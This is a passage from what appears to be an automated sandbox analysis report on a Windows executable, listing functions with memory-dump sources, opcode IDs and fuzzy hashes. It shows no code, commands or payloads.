                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 72?1
                                                                                                                          • API String ID: 0-1649870076
                                                                                                                          • Opcode ID: 1a486fd9344be56183f8f99e4a5b6bb599061207aeb25815a4b241b7f0ab7288
                                                                                                                          • Instruction ID: b82051df525321fb584b2bb5f8c4288c408de7a69ce054f8d57560ae577fade8
                                                                                                                          • Opcode Fuzzy Hash: 1a486fd9344be56183f8f99e4a5b6bb599061207aeb25815a4b241b7f0ab7288
                                                                                                                          • Instruction Fuzzy Hash: 92219FB5A00314CFC721CF99E99066FBBF5FB1A745F140898E45AAB251C735ED01CBA1
                                                                                                                          Function 00B49CE0 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                          • Opcode ID: 88baf77e6fc36ddebc773440e3e83313005a3c2546539a5348f3a49965b660da
                                                                                                                          • Instruction ID: a81e38d23a2cd40ebfb22486dc1a79cb4ddaf37eb7e4eb048efd79d1774f6117
                                                                                                                          • Opcode Fuzzy Hash: 88baf77e6fc36ddebc773440e3e83313005a3c2546539a5348f3a49965b660da
                                                                                                                          • Instruction Fuzzy Hash: 1631A9709083009BD720EF14D880A2BFBF9FF9A315F1489ACE6C897251D335DA04CBA6
                                                                                                                          Function 00B14E2A Relevance: 1.0, Instructions: 957COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 97fb4f7d50b928dcb1a72274e819d8cbd89569e696a59c936e5dd98c4468deea
                                                                                                                          • Instruction ID: 52fe177e77079e93d590c0e887a0bb2abee25ce83ca4930c7bb8e31a12417fc1
                                                                                                                          • Opcode Fuzzy Hash: 97fb4f7d50b928dcb1a72274e819d8cbd89569e696a59c936e5dd98c4468deea
                                                                                                                          • Instruction Fuzzy Hash: 7E6249B4500B00CFD735CF24D990B66BBF6EF99700F9489ACD49A87A52E730E984CB94
                                                                                                                          Function 00B0BEB0 Relevance: .9, Instructions: 895COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 30cb9a533554be97e06675d3460cdff0be9d55b2c6c1132c24f0b6137cc6b4a7
                                                                                                                          • Instruction ID: d0dd69c13337c8bbfd0bfe1b0adda389957d9b26d0d3eef196be9388414cf5d6
                                                                                                                          • Opcode Fuzzy Hash: 30cb9a533554be97e06675d3460cdff0be9d55b2c6c1132c24f0b6137cc6b4a7
                                                                                                                          • Instruction Fuzzy Hash: AF5209319087118BC7259F18D8802BAFBE1FFD5319F298B6DD9C6932D0E734A855CB86
                                                                                                                          Function 00B48652 Relevance: .7, Instructions: 710COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8ff41b2464e97a16e4bc2d60dff45716f5e55c9ed0d73978c7baf86c46ccf058
                                                                                                                          • Instruction ID: fa5c92dff85afccdc38e1e13046d22cfa0a5e87f962dc45614bc3ce0273c2e50
                                                                                                                          • Opcode Fuzzy Hash: 8ff41b2464e97a16e4bc2d60dff45716f5e55c9ed0d73978c7baf86c46ccf058
                                                                                                                          • Instruction Fuzzy Hash: 1522BE35608341DFD704DF68E89062ABBF1FF8931AF0988ADE58987351DB36D990DB42
                                                                                                                          Function 00B486F0 Relevance: .7, Instructions: 681COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f0541b6b97604d4acc7e1bd84b41a472a1b79ed3e550984770d1845213a0cf68
                                                                                                                          • Instruction ID: f094a99760e43db0bd36d6a411e8da4721b293f1b17b283631e98eac3cc53963
                                                                                                                          • Opcode Fuzzy Hash: f0541b6b97604d4acc7e1bd84b41a472a1b79ed3e550984770d1845213a0cf68
                                                                                                                          • Instruction Fuzzy Hash: 88229D35618340DFD704DF68E89061EBBF1FB8930AF0989ADE58987361DB36D990DB42
                                                                                                                          Function 00B0B3A0 Relevance: .7, Instructions: 670COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 64bb86171dd4ca64aaf5631f89ef3608b27d5604040e32528ec76ac587a7feb7
                                                                                                                          • Instruction ID: c27ddf9dfe7e0f0a4a9c689733a4dec596164ac5ad90d6e4a0f410d0c217c0a0
                                                                                                                          • Opcode Fuzzy Hash: 64bb86171dd4ca64aaf5631f89ef3608b27d5604040e32528ec76ac587a7feb7
                                                                                                                          • Instruction Fuzzy Hash: E752A370908B888FE735CB24C484BA7BFE2EF95314F144DADC5E606AC2C779A885CB55
                                                                                                                          Function 00B071F0 Relevance: .7, Instructions: 657COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: de7f7d593a34541f38bdadd0e0c4e917b23bc672bccfb6c1f05c120815574bf7
                                                                                                                          • Instruction ID: 42e4905d9290d50cd5a0d9121d77d6d9858bc96602845605ef2f70d6239f60a4
                                                                                                                          • Opcode Fuzzy Hash: de7f7d593a34541f38bdadd0e0c4e917b23bc672bccfb6c1f05c120815574bf7
                                                                                                                          • Instruction Fuzzy Hash: 8D529E3190C3458BCB15CF29C0906AAFFE1FF88314F198AADE89957391DB74E949CB81
                                                                                                                          Function 00B08FD0 Relevance: .6, Instructions: 620COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 023c1922d152f9dda9b575ed74be292c76f13ce0445e4890c4e73b57b3b23a2b
                                                                                                                          • Instruction ID: 4feb7da88f0445bbc9c943cbdad7ce9635d8f48040790a076303e1176a0803ba
                                                                                                                          • Opcode Fuzzy Hash: 023c1922d152f9dda9b575ed74be292c76f13ce0445e4890c4e73b57b3b23a2b
                                                                                                                          • Instruction Fuzzy Hash: 37424579608301DFD714CF28D85075ABBE1BF89315F0988ADE4958B3A2DB35DA85CF42
                                                                                                                          Function 00B07BF0 Relevance: .6, Instructions: 592COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fb1ac2d6e841f03a9e0ead2d905f9d8395611caa585a8e99d938da3f7f7e6b35
                                                                                                                          • Instruction ID: d6c29ca2562abe606fb5301f1016940db0acf3afc7fe7dcfa7516a0bb6f78e2c
                                                                                                                          • Opcode Fuzzy Hash: fb1ac2d6e841f03a9e0ead2d905f9d8395611caa585a8e99d938da3f7f7e6b35
                                                                                                                          • Instruction Fuzzy Hash: 2A32F170919B118FC378CE29C590526FBF2FF45710B604AAED6A787A90DB36B845CB14
                                                                                                                          Function 00B489A0 Relevance: .5, Instructions: 545COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7def8b809bf5a2ecc99415e32c93648a51f2ad1704395806c4ea38e939717e9a
                                                                                                                          • Instruction ID: 713883636b6efbda585201c71705cbfffc768e1dac8c18931dad843c38e29b3c
                                                                                                                          • Opcode Fuzzy Hash: 7def8b809bf5a2ecc99415e32c93648a51f2ad1704395806c4ea38e939717e9a
                                                                                                                          • Instruction Fuzzy Hash: 08028A35608341DFD704DF68E88061ABBE1EF8A30AF0989ADE58587361CB36D954DB92
                                                                                                                          Function 00B48A80 Relevance: .5, Instructions: 524COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d93e9505654f17a7751088871bb72a1f94546a99ba86dae7da317d60c9399be7
                                                                                                                          • Instruction ID: ab5e9b67b7d5ca528c372789c345efb0bd882603425f3ef0cbd662d99a55479f
                                                                                                                          • Opcode Fuzzy Hash: d93e9505654f17a7751088871bb72a1f94546a99ba86dae7da317d60c9399be7
                                                                                                                          • Instruction Fuzzy Hash: 32F1793560C340DFD704EF68D88061EFBE1EB8A30AF0989ADE5C987261D736D954DB92
                                                                                                                          Function 00B48C02 Relevance: .5, Instructions: 487COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9f2c6a6f6be17e052a439d8294939242390871487b3177aba3ea8f0c0747a656
                                                                                                                          • Instruction ID: 76a4bb5d9d44c602d2d434e0e4aafbfcf9032dc3b4975558e60abfe0326a5330
                                                                                                                          • Opcode Fuzzy Hash: 9f2c6a6f6be17e052a439d8294939242390871487b3177aba3ea8f0c0747a656
                                                                                                                          • Instruction Fuzzy Hash: 76E1AE31618350DFC704DF28E88062AF7F1EB8A31AF0989ACE5D987361D736D954CB92
                                                                                                                          Function 00B0A300 Relevance: .5, Instructions: 459COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8dbf8a9190905fd82ba4d34b3568b61c3c587483ba5650872ac470c2db95d517
                                                                                                                          • Instruction ID: d1e9e59413e91c8417650474d04aa45985e32111ee1edf7b549df14f32e4cb29
                                                                                                                          • Opcode Fuzzy Hash: 8dbf8a9190905fd82ba4d34b3568b61c3c587483ba5650872ac470c2db95d517
                                                                                                                          • Instruction Fuzzy Hash: E2F19A766083418FC724CF29C88166BBFE6AFD8300F088D6DE4D587792E639E945CB56
                                                                                                                          Function 00B48E70 Relevance: .4, Instructions: 420COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
